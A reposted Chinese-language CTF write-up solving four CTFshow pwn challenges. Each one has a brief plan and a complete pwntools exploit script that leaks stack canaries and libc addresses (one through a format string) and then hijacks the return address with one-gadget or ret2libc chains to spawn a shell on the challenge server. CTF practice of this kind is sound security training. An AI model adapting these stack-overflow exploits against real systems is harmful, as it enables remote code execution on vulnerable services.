PWN-PRACTICE-CTFSHOW-6
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-CTFSHOW-6
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
PWN-PRACTICE-CTFSHOW-6
- 36D杯-MengxinStack
- 36D杯-tang
- 1024杯-1024_happy_stack
- 1024杯-1024_happy_checkin
36D杯-MengxinStack
程序開了canary和PIE保護
泄露遠程libc版本,為 libc6_2.23-0ubuntu10_amd64.so
泄露canary->覆蓋返回地址低字節,重新調用main->泄露libc基地址->覆蓋返回地址為one-gadget
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28124) elf=ELF("./pwn1")#泄露遠程libc版本 #io.recvuntil("She said: hello?\n") #payload="a"*0x40+"b"*8 #io.send(payload) #io.recvuntil("b"*8) #__libc_start_main_ret=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) #print("__libc_start_main_ret=="+hex(__libc_start_main_ret))#遠程libc libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")#泄露canary io.recvuntil("She said: hello?\n") payload="a"*32+"b"*8 io.sendline(payload) io.recvuntil("b"*8) canary=u64(io.recv(8))-0xa print("canary=="+hex(canary))#.text:00000000000207FA mov rax, fs:2F8h #.text:0000000000020803 mov [rsp+0B8h+var_48], rax #.text:0000000000020808 lea rax, [rsp+0B8h+var_98] #.text:000000000002080D mov fs:300h, rax #.text:0000000000020816 mov rax, cs:environ_ptr_0 #.text:000000000002081D mov rsi, [rsp+0B8h+var_B0] #.text:0000000000020822 mov edi, [rsp+0B8h+var_A4] #.text:0000000000020826 mov rdx, [rax] #.text:0000000000020829 mov rax, [rsp+0B8h+var_A0] #.text:000000000002082E call rax #.text:0000000000020830 #.text:0000000000020830 loc_20830: ; CODE XREF: __libc_start_main+134↓j #.text:0000000000020830 mov edi, eax #.text:0000000000020832 call exit#覆蓋返回地址低字節,重新調用main payload="a"*40+p64(canary)+"b"*0x18+"\x16" io.send(payload)#泄露libc基址 io.recvuntil("She said: hello?\n") payload="a"*0x40+"b"*8 io.send(payload) io.recvuntil("b"*8) __libc_start_main=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-(0x20830-0x20740) libc_base=__libc_start_main-libc.sym["__libc_start_main"] ogg=libc_base+0x45216#覆蓋返回地址到one-gadget payload="a"*40+p64(canary)+"b"*0x18+p64(ogg) io.send(payload)io.interactive()36D杯-tang
保護全開,這題思路和36D杯-MengxinStack很像
泄露遠程libc版本,為 libc6_2.23-0ubuntu10_amd64.so
泄露canary->覆蓋返回地址低字節,重新調用main->泄露libc基地址->覆蓋返回地址為one-gadget
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28026) elf=ELF("./pwn1")#泄露遠程libc版本 #io.recvuntil("你怎么了?\n") #io.send("%23$p") #io.recvuntil("0x") #__libc_start_main_ret=int(io.recv(12),16) #print("__libc_start_main_ret=="+hex(__libc_start_main_ret))#遠程libc libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")#泄露canary io.recvuntil("你怎么了?\n") io.send("%9$p") io.recvuntil("0x") canary=int(io.recv(16),16) print("canary=="+hex(canary))#.text:00000000000207FA mov rax, fs:2F8h #.text:0000000000020803 mov [rsp+0B8h+var_48], rax #.text:0000000000020808 lea rax, [rsp+0B8h+var_98] #.text:000000000002080D mov fs:300h, rax #.text:0000000000020816 mov rax, cs:environ_ptr_0 #.text:000000000002081D mov rsi, [rsp+0B8h+var_B0] #.text:0000000000020822 mov edi, [rsp+0B8h+var_A4] #.text:0000000000020826 mov rdx, [rax] #.text:0000000000020829 mov rax, [rsp+0B8h+var_A0] #.text:000000000002082E call rax #.text:0000000000020830 #.text:0000000000020830 loc_20830: ; CODE XREF: __libc_start_main+134↓j #.text:0000000000020830 mov edi, eax #.text:0000000000020832 call exitio.recvuntil("燙\n") io.sendline("P1umH0")#覆蓋返回地址低字節,重新調用main io.recvuntil("遠一點!\n") payload="a"*56+p64(canary)+"b"*0x18+"\x16" io.send(payload)#泄露libc基址 io.recvuntil("你怎么了?\n") io.send("%23$p") io.recvuntil("0x") __libc_start_main=int(io.recv(12),16)-(0x20830-0x20740) libc_base=__libc_start_main-libc.sym["__libc_start_main"] ogg=libc_base+0xf1147io.recvuntil("燙\n") io.sendline("P1umH0")#覆蓋返回地址到one-gadget io.recvuntil("遠一點!\n") payload="a"*56+p64(canary)+"b"*0x18+p64(ogg) io.send(payload)io.interactive()1024杯-1024_happy_stack
棧溢出,用"36D\x00"繞過strcmp,然后ret2libc
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28138) elf=ELF("./pwn1")puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main_addr=0x4006AE pop_rdi=0x400803 ret=0x40028aio.recvuntil("qunzhu\n\n") payload="36D\x00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr) io.sendline(payload) puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("puts_addr=="+hex(puts_addr)) libc_base=puts_addr-0x0809c0 system=libc_base+0x04f440 binsh=libc_base+0x1b3e9aio.recvuntil("qunzhu\n\n") payload="36D\x00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system) io.sendline(payload)io.interactive()1024杯-1024_happy_checkin
棧溢出,ret2libc
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28173) elf=ELF("./pwn1")puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main_addr=0x4005F7 pop_rdi=0x4006e3 ret=0x4004c6io.recvuntil("ticket\n") payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr) io.sendline(payload) puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("puts_addr=="+hex(puts_addr)) libc_base=puts_addr-0x0809c0 system=libc_base+0x04f440 binsh=libc_base+0x1b3e9aio.recvuntil("ticket\n") payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system) io.sendline(payload)io.interactive() 創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎總結
以上是生活随笔為你收集整理的PWN-PRACTICE-CTFSHOW-6的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 祝贺!翟志刚王亚平获二级航天功勋奖章
- 下一篇: 大学计算机上机实验指导与测试pdf,4大